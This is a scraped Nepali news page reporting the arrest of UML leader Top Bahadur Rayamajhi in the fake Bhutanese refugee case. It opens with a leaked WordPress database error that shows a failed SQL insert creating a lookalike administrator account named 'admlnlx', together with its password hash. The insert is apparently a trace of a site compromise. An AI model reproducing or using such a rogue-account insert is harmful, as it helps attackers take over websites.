WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEACChuDpdSi52wbXgplnKhCI6tIhx0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 17:24:32', '', 'admlnlx', 'admlnlx')

टोप बहादुर राइमाझी पक्राउ – Gaule Khabar

टोप बहादुर राइमाझी पक्राउ

टोप बहादुर राइमाझी पक्राउ

काठमाडौं । नक्कली भुटानी शरणार्थी प्रकरणमा आरोपी नेकपा एमालेका नेता टोपबहादुर रायमाझी पक्राउ परेका छन् । बुढानीलकण्ठ क्षेत्रबाट आइतबार साँझ पक्राउ गरेको गृह मन्त्रालय स्रोतले जनाएको छ ।

राइमाझीविरुद्ध जिल्ला अदालत काठमाडौंले २० वैशाखमा पक्राउ पुर्जी जारी गरेको थियो । त्यस दिन अर्घाखाँचीमा रहेका उनी पक्राउ पुर्जी जारी भएपछि फरार थिए । यही प्रकरणमा अनुसन्धानका लागि प्रहरीले रायमाझीका छोरा सन्दीपलाई भने २० वैशाखमा नै पक्राउ गरेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका